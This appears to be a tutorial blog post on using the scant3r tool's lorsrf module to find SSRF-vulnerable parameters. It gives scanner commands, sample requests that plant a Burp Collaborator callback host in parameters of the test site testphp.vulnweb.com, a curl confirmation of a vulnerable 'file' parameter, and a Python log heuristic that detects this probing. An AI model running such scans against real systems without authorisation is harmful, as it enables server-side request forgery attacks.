How to find SSRF parameters with scant3r

Hello, this is a short post about how to find SSRF parameters in your target
using scant3r, with any HTTP method and JSON support.

Requirements

  • python 3.6+ 
  • pip 
  • OAST Host (burp collaborator or interactsh.com)

Installation

>>> git clone https://github.com/knassar702/scant3r
>>> cd scant3r
>>> pip install -r requirements.txt
>>> ./scant3r.py

                          __ _____     
   ______________ _____  / /|__  /_____
  / ___/ ___/ __ `/ __ \/ __//_ </ ___/
 (__  ) /__/ /_/ / / / / /____/ / /    
/____/\___/\__,_/_/ /_/\__/____/_/ 

[!] Coded by: Khaled Nassar @knassar702
[!] Version: 0.8#Beta

[ERROR][2021-11-11,05:42:48] scant3r -> No Targets 

Usage

Now the tool is ready to use. We will use the lorsrf module to find SSRF
parameters via the GET and POST methods, but we need an OAST host. You can
generate one from Burp Suite or from https://app.interactsh.com/ and pass it
to scant3r with the -x option.

>>> echo 'http://testphp.vulnweb.com/showimage.php' | ./scant3r.py -m lorsrf -x http://kl9qtqocm9pxhsxwy7x1e9yds4yvmk.burpcollaborator.net -M GET,POST

Now scant3r will start adding parameters from the list
wordlists/ssrf_parameters.txt via the GET and POST methods, with your host as
the value of each parameter.

Example request

GET /api/?test=kl9qtqocm9pxhsxwy7x1e9yds4yvmk.burpcollaborator.net&anotherone=kl9qtqocm9pxhsxwy7x1e9yds4yvmk.burpcollaborator.net
Host: target.com
User-agent: Firefox


POST /api/
Host: target.com
User-agent: Firefox

test=kl9qtqocm9pxhsxwy7x1e9yds4yvmk.burpcollaborator.net&anotherone=kl9qtqocm9pxhsxwy7x1e9yds4yvmk.burpcollaborator.net

OK, after running the command we got this request:

[Image: burpcall]

Awesome, now we have found a vulnerable parameter, but the first question you
will ask yourself is “How can I find the vulnerable parameter?” To fix this
problem, you can include information about the target in your OAST host. How?
With these variables:

  • PATH – the path being scanned (e.g. /v0.1/api/)
  • HOST – the host of the target
  • PARAM – the vulnerable parameter

Just add one of these variables to your OAST host via the -x option, for example:

target: http://google.com/hackerman/

>>> http://yourhost.com
param=http://yourhost.com

>>> http://yourhost.com%PATH%
param=http://yourhost.com/hackerman/

>>> http://%PARAM%.yourhost.com
param=http://param.yourhost.com

>>> http://yourhost.com/?name=%PARAM%&loc=%PATH%
param=http://yourhost.com/?name=param&loc=/hackerman/

Let’s use this:

>>> echo 'http://testphp.vulnweb.com/showimage.php' | ./scant3r.py -m lorsrf -x "http://%PARAM%.kl9qtqocm9pxhsxwy7x1e9yds4yvmk.burpcollaborator.net%PATH%" -M GET,POST

And this is the request we got 😀

[Image: burpcal2]

Awesome, now we have the parameter name (file) and the path (/showimage.php). Let’s test it:

>>> curl http://testphp.vulnweb.com/showimage.php?file=http://testing.98ffgfb19ycm4hkllwkq1yl2ftll9a.burpcollaborator.net

<html><body>y0sneqpvgkn8wt3rm90cwmzjkgz</body></html>

Worked :D

For JSON support you can add the --json option.

Example:


>>> echo 'http://testphp.vulnweb.com/showimage.php' | ./scant3r.py -m lorsrf -x "http://%PARAM%.kl9qtqocm9pxhsxwy7x1e9yds4yvmk.burpcollaborator.net%PATH%" -M GET,POST --json
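
The requests lorsrf sends have a recognizable shape in server logs: several parameters in one request all carry the same external host, optionally with the parameter name as the first DNS label (the %PARAM% template). As an added example (not part of scant3r or the original post), this heuristic flags such requests across query strings, form bodies and JSON bodies; the function names, the flat JSON object shape and the placeholder host oast.example.net are assumptions.

```python
import json
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Value that is a bare hostname or an http(s) URL; group 1 is the hostname.
HOST_RE = re.compile(r"^(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})(?:[:/?].*)?$", re.I)

def extract_params(url, body="", content_type=""):
    """Collect (name, value) pairs from the query string, form body or JSON body."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if "json" in content_type.lower():
        try:
            data = json.loads(body)
        except ValueError:
            data = None
        if isinstance(data, dict):  # assumption: flat object of string values
            pairs += [(k, v) for k, v in data.items() if isinstance(v, str)]
    elif body:
        pairs += parse_qsl(body, keep_blank_values=True)
    return pairs

def sprayed_hosts(pairs, min_params=2):
    """Return external hosts that appear as the value of >= min_params parameters."""
    hits = Counter()
    for name, value in pairs:
        match = HOST_RE.match(value.strip())
        if not match:
            continue
        labels = match.group(1).lower().split(".")
        # %PARAM% template: the parameter's own name is the first DNS label.
        if len(labels) > 2 and labels[0] == name.lower():
            labels = labels[1:]
        hits[".".join(labels)] += 1
    return sorted(host for host, count in hits.items() if count >= min_params)

# Constructed sample requests as (url, content type, body); placeholder hosts only.
SAMPLES = [
    ("http://target.example/api/?test=oast.example.net&anotherone=oast.example.net", "", ""),
    ("http://target.example/api/", "application/x-www-form-urlencoded",
     "test=http://test.oast.example.net/api/&anotherone=http://anotherone.oast.example.net/api/"),
    ("http://target.example/api/", "application/json",
     '{"test": "http://test.oast.example.net/api/", "anotherone": "http://anotherone.oast.example.net/api/"}'),
    ("http://target.example/showimage.php?file=./pictures/1.jpg&size=160", "", ""),
]

if __name__ == "__main__":
    for url, ctype, body in SAMPLES:
        print(url, sprayed_hosts(extract_params(url, body, ctype)))
```

A single parameter that legitimately holds an external URL is not flagged; only the repeated-host pattern is, so tune min_params to the application's normal traffic.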

For more help you can read this wiki page (https://github.com/knassar702/scant3r/wiki/lorsrf) and run
>>> ./scant3r.py --help

Have a nice day, bye 🙂
